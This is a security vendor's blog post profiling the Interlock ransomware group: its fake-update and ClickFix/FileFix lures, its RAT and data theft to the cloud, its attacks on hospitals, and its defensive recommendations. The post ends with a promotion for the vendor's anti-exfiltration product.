The Interlock Ransomware Problem Security Teams Can’t Ignore

Interlock ransomware has gone from an unknown threat to a top-tier group in less than a year. In 2025, it has disrupted hospitals, city governments, and regional enterprises, showing it is far from a niche campaign. A healthcare ransomware attack can cancel surgeries, delay treatments, and risk patient lives, while citywide incidents have paralyzed local government services.

What makes Interlock stand out is the way it combines social engineering and a double extortion ransomware model that pressures victims on two fronts: operational downtime and public exposure through a data leak site. Authorities like CISA and the FBI have issued alerts, showing the urgency for defenders to study its methods. The group’s blend of drive-by download attacks, lures, and patient intrusions proves that ransomware has moved beyond crude spam campaigns.

Interlock Ransomware first appeared in September 2024, identified by the “.interlock” extension left on encrypted files. Its operators quickly started leveraging the double extortion ransomware model, encrypting systems while stealing sensitive data to pressure victims into paying.

From the outset, Interlock targeted both Windows and Linux environments and even developed a rare FreeBSD variant, demonstrating cross-platform capabilities uncommon for new groups. At the beginning, Interlock did not operate like a large ransomware-as-a-service (RaaS) collective. Instead, it behaved more like a closed crew, running its own infrastructure and leak site rather than outsourcing. The gang’s early campaigns hit education, healthcare, and government organizations across the U.S. and Europe.

By winter 2024, it had already gained a reputation for persistence, using backdoors and having long dwell times before launching encryption. These traits, coupled with an aggressive targeting strategy, aligned Interlock with big-game hunting ransomware groups that prioritize maximum disruption and payout potential. Its emergence set the stage for the escalation that followed throughout 2025.

The biggest risks of data loss are financial. According to IBM, for instance, the average cost of a data breach in 2024 now stands at $4.4 million. However, this can grow significantly for firms in certain sectors, such as heavily regulated industries.

Healthcare organizations that are subject to HIPAA are especially vulnerable due to the sensitive nature of the data they possess and the large regulatory penalties for failures. IBM’s research found these companies faced the highest costs of any sector, with average data breach expenses reaching $7.42 million, followed by financial services ($5.56 million).

However, almost every business holds some form of personally identifiable information (PII) that will be of value to hackers. Regulations such as GDPR can result in large fines for the exposure of such data, in addition to the severe reputational damage that poor data handling can result in.

Unlike many groups that lean heavily on phishing, Interlock pioneered a distinct infection chain built on web-based deception. The gang leverages drive-by download attacks from compromised websites, often disguised as fake browser updater ransomware installers. Victims believe they are running a legitimate Chrome or Edge update, but in reality, they execute a hidden PowerShell payload.

Another hallmark tactic is the ClickFix technique.

Here, users land on a fraudulent CAPTCHA or error page instructing them to press certain keys. The keystrokes paste and run malicious code via the Windows Run dialog, meaning the victim essentially installs the malware for the attacker. In 2025, Interlock expanded on this approach with FileFix social engineering, which abuses Windows File Explorer’s address bar to achieve the same result.

Together, these ploys create a user led Interlock ransomware attack chain: initial access via deception, payload execution through PowerShell, and foothold establishment without tripping obvious alarms. These somewhat unique entry techniques explain why Interlock’s campaigns have been unusually successful at bypassing defenses.

Once inside, Interlock uses a RAT-based payload to establish control. This backdoor provides remote access, allowing attackers to escalate privileges and deploy additional tools. Keyloggers and credential dumpers harvest passwords, enabling lateral movement through RDP or by installing remote tools like AnyDesk. The group has been observed dwelling in networks for weeks, creating a long ransomware forensic timeline before encryption begins.

During this stage, data theft takes priority. Interlock is notable for using cloud-native tools: it has employed Microsoft’s Storage Explorer and AzCopy to funnel gigabytes of data into attacker-controlled Azure blob containers. This is an example of Azure data exfiltration ransomware tactics. Stolen data is later posted on Interlock’s data leak site if victims resist payment.

When ready, the group deploys its encryptor (disguised as conhost.exe), locking files across servers. The result is complete operational disruption combined with the threat of exposure, an attack model designed to maximize leverage.

Interlock’s targeting is rather opportunistic but strategic. Its victims span government, education, manufacturing, and technology sectors, yet the most alarming incidents have been in healthcare.

A healthcare ransomware attack has disproportionate impact: downtime can delay treatments, expose medical records, and risk patient safety. Hospitals in the U.S. and Europe have already been forced offline by Interlock, illustrating its capability to hit critical services.

The group’s opportunism mirrors that of other big-game hunting ransomware crews, but its methods allow it to scale down as well. Regional practices and community organizations have also appeared on its leak site.

Geographically, campaigns concentrate on North America and Europe, but nothing suggests attackers will stop there. By combining opportunistic targeting with high-impact industries, Interlock amplifies its pressure campaign.

Any organization that handles sensitive data, operates mission-critical infrastructure, or cannot afford downtime should consider itself at risk. In other words: the net is wide, and the stakes are high.

2025 has unfortunately been the year of Interlock’s escalation.

The volume of victims listed on its data leak site surged through spring and summer, with hospitals, city governments, and private companies all making appearances. Analysts observed that the introduction of FileFix social engineering marked a tactical shift, adding complexity to the group’s skillset.

Meanwhile, its payloads gained obfuscation features designed to bypass endpoint detection and response (EDR) tools, showing that the developers are actively iterating. U.S. government advisories from CISA and the FBI confirmed these evolutions, warning defenders to expect more stealth, more automation, and more widespread targeting.

Interlock is no longer just another gang; it is a headline actor in the global ransomware ecosystem. Its playbook demonstrates how ransomware tactics, techniques, and procedures (TTPs) evolve quickly: from ClickFix to FileFix, from on-premises exfiltration to cloud-based theft. Each change increases both the speed and the effectiveness of campaigns.

Healthcare has been hardest hit by Interlock’s campaigns, offering difficult lessons for defenders. A huge U.S. dialysis provider faced a healthcare ransomware attack in April 2025, with more than two million patient records exfiltrated before encryption. The breach forced clinics into manual operations and resulted in weeks of disruption.

Soon after, an Ohio hospital system with 14 facilities went dark when Interlock compromised its IT backbone. Emergency patients were diverted, procedures delayed, and recovery took more than two weeks. Experts concluded that inadequate network segmentation allowed ransomware to propagate across the hospital network.

Another incident at a university health system showed how long attackers can dwell undetected, up to 17 days in some cases, before triggering encryption. The common thread across these breaches is that lack of visibility, segmentation gaps, and limited incident response readiness left organizations vulnerable.

Fighting Interlock Ransomware requires layered ransomware mitigation strategies that address both prevention and response. Start with DNS filtering and secure web gateways to block malicious sites and cut off drive-by download attacks. Train users on lures like the ClickFix technique and FileFix social engineering, awareness is the first line of defense.

Deploy EDR solutions to flag unusual PowerShell activity, remote access tools, or unauthorized use of AzCopy. Implement zero trust principles and enforce network segmentation so that a single compromised machine cannot bring down entire systems. Regular patching closes vulnerabilities that attackers might exploit once inside.

Maintaining updated detection rules and monitoring for Interlock’s known IOCs is equally important. By combining user education, technical protection mechanisms, and practiced recovery, defenders can reduce the risk of catastrophic impact, even against threats like Interlock ransomware.

Interlock shows where ransomware is going: becoming harder to detect, trickier to spot, and more connected to cloud systems. Experts think the group will keep improving its methods, possibly creating new ways to break in or testing better tools to steal data.

It’s also likely they’ll develop attacks that work across different systems, from Windows servers to virtual setups. These new tactics will probably spread across the ransomware world, meaning other groups might copy ideas like ClickFix and FileFix.

Ransomware is now a campaign, not a single event. Stealth, persistence, and data theft create the leverage that makes extortion work. Disrupting this process requires more than endpoint detection.

BlackFog’s anti data exfiltration (ADX) technology blocks unauthorized outbound traffic, including misuse of tools like AzCopy or Rclone, preventing attackers from stealing data in the first place. For healthcare, municipal, and infrastructure sectors, ADX adds a proactive layer to your cybersecurity strategy, removing the leverage that makes ransomware effective. Learn more today.